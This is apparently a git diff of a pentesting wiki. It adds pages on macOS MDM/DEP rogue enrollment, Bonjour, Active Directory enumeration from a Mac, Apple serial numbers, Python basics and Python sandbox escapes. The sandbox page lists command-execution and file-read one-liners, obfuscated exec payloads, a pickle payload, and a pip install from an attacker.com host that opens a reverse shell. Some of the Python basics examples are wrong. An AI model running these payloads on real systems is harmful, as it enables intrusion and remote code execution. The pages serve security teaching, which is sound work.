"+15555555555"; +OrganizationZipCode = "12345"; +SkipSetup = ( + +); +SupervisorHostCertificates = ( +); +} +``` + +Although some of this information might be publicly available for certain organizations, having a serial number of a device owned by the organization along with the information obtained from the DEP profile could be used against an organization's help desk or IT team to perform any number of social engineering attacks, such as requesting a password reset or help enrolling a device in the company's MDM server. + +#### Rogue DEP Enrollment + +The [Apple MDM protocol](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf) supports - but does not require - user authentication prior to MDM enrollment via [HTTP Basic Authentication](https://en.wikipedia.org/wiki/Basic_access_authentication). **Without authentication, all that's required to enroll a device in an MDM server via DEP is a valid, DEP-registered serial number**. Thus, an attacker that obtains such a serial number, \(either through [OSINT](https://en.wikipedia.org/wiki/Open-source_intelligence), social engineering, or by brute-force\), will be able to enroll a device of their own as if it were owned by the organization, as long as it's not currently enrolled in the MDM server. Essentially, if an attacker is able to win the race by initiating the DEP enrollment before the real device, they're able to assume the identity of that device. + +Organizations can - and do - leverage MDM to deploy sensitive information such as device and user certificates, VPN configuration data, enrollment agents, Configuration Profiles, and various other internal data and organizational secrets. Additionally, some organizations elect not to require user authentication as part of MDM enrollment. This has various benefits, such as a better user experience, and not having to [expose the internal authentication server to the MDM server to handle MDM enrollments that take place outside of the corporate network](https://docs.simplemdm.com/article/93-ldap-authentication-with-apple-dep). + +This presents a problem when leveraging DEP to bootstrap MDM enrollment, though, because an attacker would be able to enroll any endpoint of their choosing in the organization's MDM server. Additionally, once an attacker successfully enrolls an endpoint of their choosing in MDM, they may obtain privileged access that could be used to further pivot within the network. + diff --git a/macos/macos-security-and-privilege-escalation/macos-protocols.md b/macos/macos-security-and-privilege-escalation/macos-protocols.md new file mode 100644 index 00000000000..38a0bfd296c --- /dev/null +++ b/macos/macos-security-and-privilege-escalation/macos-protocols.md @@ -0,0 +1,82 @@ +# MacOS Protocols + +## Bonjour + +**Bonjour** is an Apple-designed technology that enables computers and **devices located on the same network to learn about services offered** by other computers and devices. It is designed such that any Bonjour-aware device can be plugged into a TCP/IP network and it will **pick an IP address** and make other computers on that network **aware of the services it offers**. Bonjour is sometimes referred to as Rendezvous, **Zero Configuration**, or Zeroconf. +Zero Configuration Networking, such as Bonjour provides: + +* Must be able to **obtain an IP Address** \(even without a DHCP server\) +* Must be able to do **name-to-address translation** \(even without a DNS server\) +* Must be able to **discover services on the network** + +The device will get an **IP address in the range 169.254/16** and will check if any other device is using that IP address. If not, it will keep the IP address. Macs keeps an entry in their routing table for this subnet: `netstat -rn | grep 169` + +For DNS the **Multicast DNS \(mDNS\) protocol is used**. [**mDNS** **services** listen in port **5353/UDP**](../../pentesting/5353-udp-multicast-dns-mdns.md), use **regular DNS queries** and use the **multicast address 224.0.0.251** instead of sending the request just to an IP address. Any machine listening these request will respond, usually to a multicast address, so all the devices can update their tables. +Each device will **select its own name** when accessing the network, the device will choose a name **ended in .local** \(might be based on the hostname or a completely random one\). + +For **discovering services DNS Service Discovery \(DNS-SD\)** is used. + +The final requirement of Zero Configuration Networking is met by **DNS Service Discovery \(DNS-SD\)**. DNS Service Discovery uses the syntax from DNS SRV records, but uses **DNS PTR records so that multiple results can be returned** if more than one host offers a particular service. A client requests the PTR lookup for the name `.` and **receives** a list of zero or more PTR records of the form `..`. + +The `dns-sd` binary can be used to **advertise services and perform lookups** for services: + +```bash +#Search ssh services +dns-sd -B _ssh._tcp + +Browsing for _ssh._tcp +DATE: ---Tue 27 Jul 2021--- +12:23:20.361 ...STARTING... +Timestamp A/R Flags if Domain Service Type Instance Name +12:23:20.362 Add 3 1 local. _ssh._tcp. M-C02C934RMD6R +12:23:20.362 Add 3 10 local. _ssh._tcp. M-C02C934RMD6R +12:23:20.362 Add 2 16 local. _ssh._tcp. M-C02C934RMD6R +``` + +```bash +#Announce HTTP service +dns-sd -R "Index" _http._tcp . 80 path=/index.html + +#Search HTTP services +dns-sd -B _http._tcp +``` + +When a new service is started the **new service mulitcasts its presence to everyone** on the subnet. The listener didn’t have to ask; it just had to be listening. + +You ca use [**this tool**](https://apps.apple.com/us/app/discovery-dns-sd-browser/id1381004916?mt=12) to see the **offered services** in your current local network. +Or you can write your own scripts in python with [**python-zeroconf**](https://github.com/jstasiak/python-zeroconf): + +```python +from zeroconf import ServiceBrowser, Zeroconf + + +class MyListener: + + def remove_service(self, zeroconf, type, name): + print("Service %s removed" % (name,)) + + def add_service(self, zeroconf, type, name): + info = zeroconf.get_service_info(type, name) + print("Service %s added, service info: %s" % (name, info)) + + +zeroconf = Zeroconf() +listener = MyListener() +browser = ServiceBrowser(zeroconf, "_http._tcp.local.", listener) +try: + input("Press enter to exit...\n\n") +finally: + zeroconf.close() +``` + +If you feel like Bonjour might be more secured **disabled**, you can do so with: + +```bash +sudo launchctl unload -w /System/Library/LaunchDaemons/com.apple.mDNSResponder.plist +``` + +## References + +* [**The Mac Hacker's Handbook**](https://www.amazon.com/-/es/Charlie-Miller-ebook-dp-B004U7MUMU/dp/B004U7MUMU/ref=mt_other?_encoding=UTF8&me=&qid=)\*\*\*\* +* \*\*\*\*[**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html)\*\*\*\* + diff --git a/macos/macos-security-and-privilege-escalation/macos-red-teaming.md b/macos/macos-security-and-privilege-escalation/macos-red-teaming.md new file mode 100644 index 00000000000..74ce5453e29 --- /dev/null +++ b/macos/macos-security-and-privilege-escalation/macos-red-teaming.md @@ -0,0 +1,100 @@ +# MacOS Red Teaming + +## Common management methods + +* JAMF Pro: `jamf checkJSSConnection` +* Kandji + +If you manage to **compromise admin credentials** to access the management platform, you can **potentially compromise all the computers** by distributing your malware in the machines. + +For red teaming in MacOS environments it's highly recommended to have some understanding of how the MDMs work: + +{% page-ref page="macos-mdm/" %} + +And also about **MacOS** "special" **network** **protocols**: + +{% page-ref page="macos-protocols.md" %} + +## Active Directory + +In some occasions you will find that the **MacOS computer is connected to an AD**. In this scenario you should try to **enumerate** the active directory as you are use to it. Find some **help** in the following pages: + +{% page-ref page="../../pentesting/pentesting-ldap.md" %} + +{% page-ref page="../../windows/active-directory-methodology/" %} + +{% page-ref page="../../pentesting/pentesting-kerberos-88/" %} + +Some **local MacOS tool** that may also help you is `dscl`: + +```bash +dscl "/Active Directory/[Domain]/All Domains" ls / +``` + +Also there are some tools prepared for MacOS to automatically enumerate the AD and play with kerberos: + +* [**Machound**](https://github.com/XMCyber/MacHound): MacHound is an extension to the Bloodhound audting tool allowing collecting and ingesting of Active Directory relationships on MacOS hosts. +* \*\*\*\*[**Bifrost**](https://github.com/its-a-feature/bifrost): Bifrost is an Objective-C project designed to interact with the Heimdal krb5 APIs on macOS. The goal of the project is to enable better security testing around Kerberos on macOS devices using native APIs without requiring any other framework or packages on the target. +* \*\*\*\*[**Orchard**](https://github.com/its-a-feature/Orchard): JavaScript for Automation \(JXA\) tool to do Active Directory enumeration. + +### Domain Information + +```text +echo show com.apple.opendirectoryd.ActiveDirectory | scutil +``` + +### Users + +The three types of MacOS users are: + +* **Local Users** — Managed by the local OpenDirectory service, they aren’t connected in any way to the Active Directory. +* **Network Users** — Volatile Active Directory users who require a connection to the DC server to authenticate. +* **Mobile Users** — Active Directory users with a local backup for their credentials and files. + +The local information about users and groups is stored in in the folder _/var/db/dslocal/nodes/Default._ +For example, the info about user called _mark_ is stored in _/var/db/dslocal/nodes/Default/users/mark.plist_ and the info about the group _admin_ is in _/var/db/dslocal/nodes/Default/groups/admin.plist_. + +In addition to using the HasSession and AdminTo edges, **MacHound adds three new edges** to the Bloodhound database: + +* **CanSSH** - entity allowed to SSH to host +* **CanVNC** - entity allowed to VNC to host +* **CanAE** - entity allowed to execute AppleEvent scripts on host + +```bash +#User enumeration +dscl . ls /Users +dscl . read /Users/[username] +dscl "/Active Directory/TEST/All Domains" ls /Users +dscl "/Active Directory/TEST/All Domains" read /Users/[username] +dscacheutil -q user + +#Computer enumeration +dscl "/Active Directory/TEST/All Domains" ls /Computers +dscl "/Active Directory/TEST/All Domains" read "/Computers/[compname]$" + +#Group enumeration +dscl . ls /Groups +dscl . read "/Groups/[groupname]" +dscl "/Active Directory/TEST/All Domains" ls /Groups +dscl "/Active Directory/TEST/All Domains" read "/Groups/[groupname]" + +#Domain Information +dsconfigad -show +``` + +More info in [https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/](https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/) + +## External Services + +MacOS Red Teaming is different from a regular Windows Red Teaming as usually **MacOS is integrated with several external platforms directly**. A common configuration of MacOS is to access to the computer using **OneLogin synchronised credentials, and accessing several external services** \(like github, aws...\) via OneLogin: + +![](../../.gitbook/assets/image%20%28562%29.png) + +### + +## References + +* [https://www.youtube.com/watch?v=IiMladUbL6E](https://www.youtube.com/watch?v=IiMladUbL6E) +* [https://medium.com/xm-cyber/introducing-machound-a-solution-to-macos-active-directory-based-attacks-2a425f0a22b6](https://medium.com/xm-cyber/introducing-machound-a-solution-to-macos-active-directory-based-attacks-2a425f0a22b6) +* [https://gist.github.com/its-a-feature/1a34f597fb30985a2742bb16116e74e0](https://gist.github.com/its-a-feature/1a34f597fb30985a2742bb16116e74e0) + diff --git a/macos/macos-security-and-privilege-escalation/macos-serial-number.md b/macos/macos-security-and-privilege-escalation/macos-serial-number.md new file mode 100644 index 00000000000..f7e9d55bb58 --- /dev/null +++ b/macos/macos-security-and-privilege-escalation/macos-serial-number.md @@ -0,0 +1,76 @@ +# MacOS Serial Number + +Apple devices manufactured after 2010 generally have **12-character alphanumeric** serial numbers, with the **first three digits representing the manufacturing location**, the following **two** indicating the **year** and **week** of manufacture, the next **three** digits providing a **unique** **identifier**, and the **last** **four** digits representing the **model number**. + +Serial number example: **C02L13ECF8J2** + +### **3 - Manufacturing locations** + +| Code | Factory | +| :--- | :--- | +| FC | Fountain Colorado, USA | +| F | Fremont, California, USA | +| XA, XB, QP, G8 | USA | +| RN | Mexico | +| CK | Cork, Ireland | +| VM | Foxconn, Pardubice, Czech Republic | +| SG, E | Singapore | +| MB | Malaysia | +| PT, CY | Korea | +| EE, QT, UV | Taiwan | +| FK, F1, F2 | Foxconn – Zhengzhou, China | +| W8 | Shanghai China | +| DL, DM | Foxconn – China | +| DN | Foxconn, Chengdu, China | +| YM, 7J | Hon Hai/Foxconn, China | +| 1C, 4H, WQ, F7 | China | +| C0 | Tech Com – Quanta Computer Subsidiary, China | +| C3 | Foxxcon, Shenzhen, China | +| C7 | Pentragon, Changhai, China | +| RM | Refurbished/remanufactured | + +### 1 - Year of manufacturing + +| Code | Release | +| :--- | :--- | +| C | 2010/2020 \(1st half\) | +| D | 2010/2020 \(2nd half\) | +| F | 2011/2021 \(1st half\) | +| G | 2011/2021 \(2nd half\) | +| H | 2012/... \(1st half\) | +| J | 2012 \(2nd half\) | +| K | 2013 \(1st half\) | +| L | 2013 \(2nd half\) | +| M | 2014 \(1st half\) | +| N | 2014 \(2nd half\) | +| P | 2015 \(1st half\) | +| Q | 2015 \(2nd half\) | +| R | 2016 \(1st half\) | +| S | 2016 \(2nd half\) | +| T | 2017 \(1st half\) | +| V | 2017 \(2nd half\) | +| W | 2018 \(1st half\) | +| X | 2018 \(2nd half\) | +| Y | 2019 \(1st half\) | +| Z | 2019 \(2nd half\) | + +### 1 - Week of manufacturing + +The fifth character represent the week in which the device was manufactured. There are 28 possible characters in this spot: **the digits 1-9 are used to represent the first through ninth weeks**, and the **characters C through Y**, **excluding** the vowels A, E, I, O, and U, and the letter S, represent the **tenth through twenty-seventh weeks**. For devices manufactured in the **second half of the year, add 26** to the number represented by the fifth character of the serial number. For example, a product with a serial number whose fourth and fifth digits are “JH” was manufactured in the 40th week of 2012. + +### 3 - Uniq Code + +The next three digits are an identifier code which **serves to differentiate each Apple device of the same model** which is manufactured in the same location and during the same week of the same year, ensuring that each device has a different serial number. + +### 4 - Serial number + +The last four digits of the serial number represent the **product’s model**. + +### Reference + +{% embed url="https://beetstech.com/blog/decode-meaning-behind-apple-serial-number" %} + + + + + diff --git a/misc/basic-python/README.md b/misc/basic-python/README.md new file mode 100644 index 00000000000..09aef9bbe4c --- /dev/null +++ b/misc/basic-python/README.md @@ -0,0 +1,315 @@ +# Basic Python + +## Python Basics + +### Usefull information + +It is an interpreted language +list\(xrange\(\)\) == range\(\) --> In python3 range is the xrange of python2 \(it is not a list but a generator\) +The difference between a Tuple and a List is that the position of a value in a tuple gives it a meaning but the lists are just ordered values. Tuples have structures, lists have order + +### Main operations + +To raise a number you should do: 3\*\*2 \(it isn't 3^2\) +If you do 2/3 it returns 1 because you are dividing two ints. If you want decimals you should divide floats \(2.0/3.0\). +i >= j +i <= j +i == j +i != j +a and b +a or b +not a +float\(a\) +int\(a\) +str\(d\) +ord\("A"\) = 65 +chr\(65\) = 'A' +hex\(100\) = '0x64' +hex\(100\)\[2:\] = '64' +isinstance\(1, int\) = True +"a b".split\(" "\) = \['a', 'b'\] +" ".join\(\['a', 'b'\]\) = "a b" +"abcdef".startswith\("ab"\) = True +"abcdef".contains\("abc"\) = True +"abc\n".strip\(\) = "abc" +"apbc".replace\("p",""\) = "abc" +dir\(str\) = List of all the availble methods +help\(str\) = Definition of the class str +"a".upper\(\) = "A" +"A".lower\(\) = "a" +"abc".capitalize\(\) = "Abc" +sum\(\[1,2,3\]\) = 6 +sorted\(\[1,43,5,3,21,4\]\) + +**Join chars** +3 \* ’a’ = ‘aaa’ +‘a’ + ‘b’ = ‘ab’ +‘a’ + str\(3\) = ‘a3’ +\[1,2,3\]+\[4,5\]=\[1,2,3,4,5\] + +**Parts of a list** +‘abc’\[0\] = ‘a’ +'abc’\[-1\] = ‘c’ +'abc’\[1:3\] = ‘bc’ from \[1\] to \[2\] +"qwertyuiop"\[:-1\] = 'qwertyuio' + +**Comments** +\# One line comment +""" +Several lines comment +Another one +""" + +**Loops** + +```text +if a: + #somethig +elif b: + #something +else: + #something + +while(a): + #comething + +for i in range(0,100): + #something from 0 to 99 + +for letter in "hola": + #something with letter in "hola" +``` + +### Tuples + +t1 = \(1,'2,'three'\) +t2 = \(5,6\) +t3 = t1 + t2 = \(1, '2', 'three', 5, 6\) +\(4,\) = Singelton +d = \(\) empty tuple +d += \(4,\) --> Adding into a tuple +CANT! --> t1\[1\] == 'New value' +list\(t2\) = \[5,6\] --> From tuple to list + +### List \(array\) + +d = \[\] empty +a = \[1,2,3\] +b = \[4,5\] +a + b = \[1,2,3,4,5\] +b.append\(6\) = \[4,5,6\] +tuple\(a\) = \(1,2,3\) --> From list to tuple + +### Dictionary + +d = {} empty +monthNumbers={1:’Jan’, 2: ‘feb’,’feb’:2}—> monthNumbers ->{1:’Jan’, 2: ‘feb’,’feb’:2} +monthNumbers\[1\] = ‘Jan’ +monthNumbers\[‘feb’\] = 2 +list\(monthNumbers\) = \[1,2,’feb’\] +monthNumbers.values\(\) = \[‘Jan’,’feb’,2\] +keys = \[k for k in monthNumbers\] +a={'9':9} +monthNumbers.update\(a\) = {'9':9, 1:’Jan’, 2: ‘feb’,’feb’:2} +mN = monthNumbers.copy\(\) \#Independent copy +monthNumbers.get\('key',0\) \#Check if key exists, Return value of monthNumbers\["key"\] or 0 if it does not exists + +### Set + +In the sets there are not repetitions +myset = set\(\['a', 'b'\]\) = {'a', 'b'} +myset.add\('c'\) = {'a', 'b', 'c'} +myset.add\('a'\) = {'a', 'b', 'c'} \#No repetitions +myset.update\(\[1,2,3\]\) = set\(\['a', 1, 2, 'b', 'c', 3\]\) +myset.discard\(10\) \#If present, remove it, if not, nothing +myset.remove\(10\) \#If present remove it, if not, rise exception +myset2 = set\(\[1, 2, 3, 4\]\) +myset.union\(myset2\) \#Values it myset OR myset2 +myset.intersection\(myset2\) \#Values in myset AND myset2 +myset.difference\(myset2\) \#Values in myset but not in myset2 +myset.symmetric\_difference\(myset2\) \#Values that are not in myset AND myset2 \(not in both\) +myset.pop\(\) \#Get the first element of the set and remove it +myset.intersection\_update\(myset2\) \#myset = Elements in both myset and myset2 +myset.difference\_update\(myset2\) \#myset = Elements in myset but not in myset2 +myset.symmetric\_difference\_update\(myset2\) \#myset = Elements that are not in both + +### Classes + +The method in \_\_It\_\_ will be the one used by sort in order to compare if an object of this class is bigger than other + +```python +class Person(name): + def __init__(self,name): + self.name= name + self.lastName = name.split(‘ ‘)[-1] + self.birthday = None + def __It__(self, other): + if self.lastName == other.lastName: + return self.name < other.name + return self.lastName < other.lastName #Return True if the lastname is smaller + + def setBirthday(self, month, day. year): + self.birthday = date tame.date(year,month,day) + def getAge(self): + return (date time.date.today() - self.birthday).days + + +class MITPerson(Person): + nextIdNum = 0 # Attribute of the Class + def __init__(self, name): + Person.__init__(self,name) + self.idNum = MITPerson.nextIdNum —> Accedemos al atributo de la clase + MITPerson.nextIdNum += 1 #Attribute of the class +1 + + def __it__(self, other): + return self.idNum < other.idNum +``` + +### map, zip, filter, lambda, sorted and one-liners + +**Map** is like: \[f\(x\) for x in iterable\] --> map\(tutple,\[a,b\]\) = \[\(1,2,3\),\(4,5\)\] +m = map\(lambda x: x % 3 == 0, \[1, 2, 3, 4, 5, 6, 7, 8, 9\]\) --> \[False, False, True, False, False, True, False, False, True\] + +**zip** stops when the shorter of foo or bar stops: + +```text +for f, b in zip(foo, bar): + print(f, b) +``` + +**Lambda** is used to define a function +\(lambda x,y: x+y\)\(5,3\) = 8 --> Use lambda as simple **function** +**sorted**\(range\(-5,6\), key=lambda x: x\*\* 2\) = \[0, -1, 1, -2, 2, -3, 3, -4, 4, -5, 5\] --> Use lambda to sort a list +m = **filter**\(lambda x: x % 3 == 0, \[1, 2, 3, 4, 5, 6, 7, 8, 9\]\) = \[3, 6, 9\] --> Use lambda to filter +**reduce** \(lambda x,y: x\*y, \[1,2,3,4\]\) = 24 + +```text +def make_adder(n): + return lambda x: x+n +plus3 = make_adder(3) +plus3(4) = 7 # 3 + 4 = 7 + +class Car: + crash = lambda self: print('Boom!') +my_car = Car(); my_car.crash() = 'Boom!' +``` + +mult1 = \[x for x in \[1, 2, 3, 4, 5, 6, 7, 8, 9\] if x%3 == 0 \] + +### Exceptions + +```text +def divide(x,y): + try: + result = x/y + except ZeroDivisionError, e: + print “division by zero!” + str(e) + except TypeError: + divide(int(x),int(y)) + else: + print “result i”, result + finally + print “executing finally clause in any case” +``` + +### Assert\(\) + +If the condition is false the string will by printed in the screen + +```text +def avg(grades, weights): + assert not len(grades) == 0, 'no grades data' + assert len(grades) == 'wrong number grades' +``` + +### Generators, yield + +A generator, instead of returning something, it "yields" something. When you access it, it will "return" the first value generated, then, you can access it again and it will return the next value generated. So, all the values are not generated at the same time and a lot of memory could be saved using this instead of a list with all the values. + +```text +def myGen(n): + yield n + yield n + 1 +``` + +g = myGen\(6\) --> 6 +next\(g\) --> 7 +next\(g\) --> Error + +### Regular Expresions + +import re +re.search\("\w","hola"\).group\(\) = "h" +re.findall\("\w","hola"\) = \['h', 'o', 'l', 'a'\] +re.findall\("\w+\(la\)","hola caracola"\) = \['la', 'la'\] + +**Special meanings:** +. --> Everything +\w --> \[a-zA-Z0-9\_\] +\d --> Number +\s --> WhiteSpace char\[ \n\r\t\f\] +\S --> Non-whitespace char +^ --> Starts with +$ --> Ends with ++ --> One or more +\* --> 0 or more +? --> 0 or 1 occurrences + +**Options:** +re.search\(pat,str,re.IGNORECASE\) +IGNORECASE +DOTALL --> Allow dot to match newline +MULTILINE --> Allow ^ and $ to match in different lines + +re.findall\("<.\*>", "<b>foo</b>and<i>so on</i>"\) = \['<b>foo</b>and<i>so on</i>'\] +re.findall\("<.\*?>", "<b>foo</b>and<i>so on</i>"\) = \['<b>', '</b>', '<i>', '</i>'\] + +IterTools +**product** +from **itertools** import product --> Generates combinations between 1 or more lists, perhaps repeating values, cartesian product \(distributive property\) +print list\(**product**\(\[1,2,3\],\[3,4\]\)\) = \[\(1, 3\), \(1, 4\), \(2, 3\), \(2, 4\), \(3, 3\), \(3, 4\)\] +print list\(**product**\(\[1,2,3\],repeat = 2\)\) = \[\(1, 1\), \(1, 2\), \(1, 3\), \(2, 1\), \(2, 2\), \(2, 3\), \(3, 1\), \(3, 2\), \(3, 3\)\] + +**permutations** +from **itertools** import **permutations** --> Generates combinations of all characters in every position +print list\(permutations\(\['1','2','3'\]\)\) = \[\('1', '2', '3'\), \('1', '3', '2'\), \('2', '1', '3'\),... Every posible combination +print\(list\(permutations\('123',2\)\)\) = \[\('1', '2'\), \('1', '3'\), \('2', '1'\), \('2', '3'\), \('3', '1'\), \('3', '2'\)\] Every posible combination of lenght 2 + +**combinations** +from itertools import **combinations** --> Generates all possible combinations without repeating characters \(if "ab" existing, doesn't generate "ba"\) +print\(list\(**combinations**\('123',2\)\)\) --> \[\('1', '2'\), \('1', '3'\), \('2', '3'\)\] + +**combinations\_with\_replacement** +from itertools import **combinations\_with\_replacement** --> Generates all possible combinations from the char onwards\(for example, the 3rd is mixed from the 3rd onwards but not with the 2nd o first\) +print\(list\(**combinations\_with\_replacement**\('1133',2\)\)\) = \[\('1', '1'\), \('1', '1'\), \('1', '3'\), \('1', '3'\), \('1', '1'\), \('1', '3'\), \('1', '3'\), \('3', '3'\), \('3', '3'\), \('3', '3'\)\] + +### Decorators + +Decorator that size the time that a function needs to be executed \(from [here](https://towardsdatascience.com/decorating-functions-in-python-619cbbe82c74)\): + +```python +from functools import wraps +import time +def timeme(func): + @wraps(func) + def wrapper(*args, **kwargs): + print("Let's call our decorated function") + start = time.time() + result = func(*args, **kwargs) + print('Execution time: {} seconds'.format(time.time() - start)) + return result + return wrapper + +@timeme +def decorated_func(): + print("Decorated func!") +``` + +If you run it, you will see something like the following: + +```text +Let's call our decorated function +Decorated func! +Execution time: 4.792213439941406e-05 seconds +``` + diff --git a/src/generic-methodologies-and-resources/python/bruteforce-hash-few-chars.md b/misc/basic-python/bruteforce-hash-few-chars.md similarity index 88% rename from src/generic-methodologies-and-resources/python/bruteforce-hash-few-chars.md rename to misc/basic-python/bruteforce-hash-few-chars.md index 6b983a93549..7f6fbaf9577 100644 --- a/src/generic-methodologies-and-resources/python/bruteforce-hash-few-chars.md +++ b/misc/basic-python/bruteforce-hash-few-chars.md @@ -1,6 +1,4 @@ -# Bruteforce Hash Few Chars - -{{#include ../../banners/hacktricks-training.md}} +# Bruteforce hash \(few chars\) ```python import hashlib @@ -38,7 +36,7 @@ def worker(queue, thread_i, threads): def main(): procs = [] queue = Queue() - threads = cpu_count() # 2 + threads = cpu_count() # 2 for thread_i in range(threads): proc = Process(target=worker, args=(queue, thread_i, threads )) @@ -53,7 +51,3 @@ def main(): main() ``` -{{#include ../../banners/hacktricks-training.md}} - - - diff --git a/misc/basic-python/bypass-python-sandboxes.md b/misc/basic-python/bypass-python-sandboxes.md new file mode 100644 index 00000000000..7b42d34de12 --- /dev/null +++ b/misc/basic-python/bypass-python-sandboxes.md @@ -0,0 +1,477 @@ +# Bypass Python sandboxes + +These are some tricks to bypass python sandbox protections and execute arbitrary commands. + +## Command Execution Libraries + +The first thing you need to know is if you can directly execute code with some already imported library, or if you could import any of these libraries: + +```python +os.system("ls") +os.popen("ls").read() +commands.getstatusoutput("ls") +commands.getoutput("ls") +commands.getstatus("file/path") +subprocess.call("ls", shell=True) +subprocess.Popen("ls", shell=True) +pty.spawn("ls") +pty.spawn("/bin/bash") +platform.os.system("ls") + +#Import functions to execute commands +importlib.import_module("os").system("ls") +importlib.__import__("os").system("ls") +imp.load_source("os","/usr/lib/python3.8/os.py").system("ls") +imp.os.system("ls") +imp.sys.modules["os"].system("ls") +sys.modules["os"].system("ls") +__import__("os").system("ls") +import os +from os import * + +#Other interesting functions +open("/etc/passwd").read() +open('/var/www/html/input', 'w').write('123') + +#In Python2.7 +execfile('/usr/lib/python2.7/os.py') +system('ls') +``` + +Remember that the _**open**_ and _**read**_ functions can be useful to **read files** inside the python sandbox and to **write some code** that you could **execute** to **bypass** the sandbox. + +{% hint style="danger" %} +Python2 **input\(\)** function allows to execute python code before the program crashes. +{% endhint %} + +Python try to **load libraries from the current directory first** \(the following command will print where is python loading modules from\): `python3 -c 'import sys; print(sys.path)'` + +![](../../.gitbook/assets/image%20%28533%29.png) + +## Bypass pickle sandbox with default installed python packages + +### Default packages + +You can find a **list of pre-installed** packages here: [https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html](https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html) +Note that from a pickle you can make the python env **import arbitrary libraries** installed in the system. +For example the following pickle, when loaded, is going to import the pip library to use it: + +```python +#Note that here we are importing the pip library so the pickle is created correctly +#however, the victimdoesn't even need to have the library installed to execute it +#the library is going to be loaded automatically + +import pickle, os, base64, pip +class P(object): + def __reduce__(self): + return (pip.main,(["list"],)) + +print(base64.b64encode(pickle.dumps(P(), protocol=0))) +``` + +For more information about how does pickle works check this: [https://checkoway.net/musings/pickle/](https://checkoway.net/musings/pickle/) + +### Pip package + +If you have access to `pip` or to `pip.main()` you can install an arbitrary package and obtain a reverse shell calling: + +```bash +pip install http://attacker.com/Rerverse.tar.gz +pip.main(["install", "http://attacker.com/Rerverse.tar.gz"]) +``` + +You can download the package to create the reverse shell here. Please, note that before using it you should **decompress it, change the `setup.py`, and put your IP for the reverse shell**: + +{% file src="../../.gitbook/assets/reverse.tar.gz" %} + +{% hint style="info" %} +This package is called `Reverse`.However, it was specially crafted so when you exit the reverse shell the rest of the installation will fail, so you **won't leave any extra python package installed on the server** when you leave. +{% endhint %} + +## Eval-ing python code + +This is really interesting if some characters are forbidden because you can use the **hex/octal/B64** representation to **bypass** the restriction: + +```python +exec("print('RCE'); __import__('os').system('ls')") #Using ";" +exec("print('RCE')\n__import__('os').system('ls')") #Using "\n" +eval("__import__('os').system('ls')") #Eval doesn't allow ";" +eval(compile('print("hello world"); print("heyy")', '', 'exec')) #This way eval accept ";" +__import__('timeit').timeit("__import__('os').system('ls')",number=1) +#One liners that allow new lines and tabs +eval(compile('def myFunc():\n\ta="hello word"\n\tprint(a)\nmyFunc()', '', 'exec')) +exec(compile('def myFunc():\n\ta="hello word"\n\tprint(a)\nmyFunc()', '', 'exec')) +``` + +```python +#Octal +exec("\137\137\151\155\160\157\162\164\137\137\50\47\157\163\47\51\56\163\171\163\164\145\155\50\47\154\163\47\51") +#Hex +exec("\x5f\x5f\x69\x6d\xIf youca70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x73\x79\x73\x74\x65\x6d\x28\x27\x6c\x73\x27\x29") +#Base64 +exec('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='.decode("base64")) #Only python2 +exec(__import__('base64').b64decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk=')) +``` + +## Compiling Python to bypass Defenses + +In a previous example you can see how to execute any python code using the `compile` function. This is really interesting because you can execute whole scripts with loops and everything in a one liner \(and we could do the same using `exec`\). +Anyway, sometimes it could be useful to **create** a **compiled object** in a local machine and execute it in the **CTF** \(for example because we don't have the `compile` function in the CTF\). + +For example, let's compile and execute manually a function that reads _./poc.py_: + +```python +#Locally +def read(): + return open("./poc.py",'r').read() + +read.__code__.co_code +'t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00S' +``` + +```python +#On Remote +function_type = type(lambda: None) +code_type = type((lambda: None).__code__) #Get +consts = (None, "./poc.py", 'r') +bytecode = 't\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00S' +names = ('open','read') + +# And execute it using eval/exec +eval(code_type(0, 0, 3, 64, bytecode, consts, names, (), 'noname', '', 1, '', (), ())) + +#You could also execute it directly +import __builtin__ +mydict = {} +mydict['__builtins__'] = __builtin__ +codeobj = code_type(0, 0, 3, 64, bytecode, consts, names, (), 'noname', '', 1, '', (), ()) +function_type(codeobj, mydict, None, None, None)() +``` + +If you cannot access `eval` or `exec` you could create a **proper function**, but calling it directly is usually going to fail with: _constructor not accessible in restricted mode_. So you need a **function not in the restricted environment call this function.** + +```python +#Compile a regular print +ftype = type(lambda: None) +ctype = type((lambda: None).func_code) +f = ftype(ctype(1, 1, 1, 67, '|\x00\x00GHd\x00\x00S', (None,), (), ('s',), 'stdin', 'f', 1, ''), {}) +f(42) +``` + +### Decompiling Python + +Using tools like [https://www.decompiler.com/](https://www.decompiler.com/) one can decompile given compiled python code + +## Builtins + +* [Builtins functions of python2](https://docs.python.org/2/library/functions.html) +* [Builtins functions of python3](https://docs.python.org/3/library/functions.html) + +If you can access to the**`__builtins__`** object you can import libraries \(notice that you could also use here other string representation showed in last section\): + +```python +__builtins__.__dict__['__import__']("os").system("ls") +``` + +### No Builtins + +When you don't have `__builtins__` you are not going to be able to import anything nor even read or write files as **all the global functions** \(like `open`, `import`, `print`...\) **aren't loaded**. +However, **by default python import a lot of modules in memory**. This modules may seem benign, but some of them are **also importing dangerous** functionalities inside of them that can be accessed to gain even **arbitrary code execution**. + +In the following examples you can observe how to **abuse** some of this "**benign**" modules loaded to **access** **dangerous** **functionalities** inside of them. + +**Python2** + +```python +#Try to reload __builtins__ +reload(__builtins__) +import __builtin__ + +# Read recovering in offset 40 +().__class__.__bases__[0].__subclasses__()[40]('/etc/passwd').read() +# Write recovering in offset 40 +().__class__.__bases__[0].__subclasses__()[40]('/var/www/html/input', 'w').write('123') + +# Execute recovering __import__ (class 59s is ) +().__class__.__bases__[0].__subclasses__()[59]()._module.__builtins__['__import__']('os').system('ls') +# Execute (another method) +().__class__.__bases__[0].__subclasses__()[59].__init__.__getattribute__("func_globals")['linecache'].__dict__['os'].__dict__['system']('ls') +# Execute recovering eval symbol (class 59 is ) 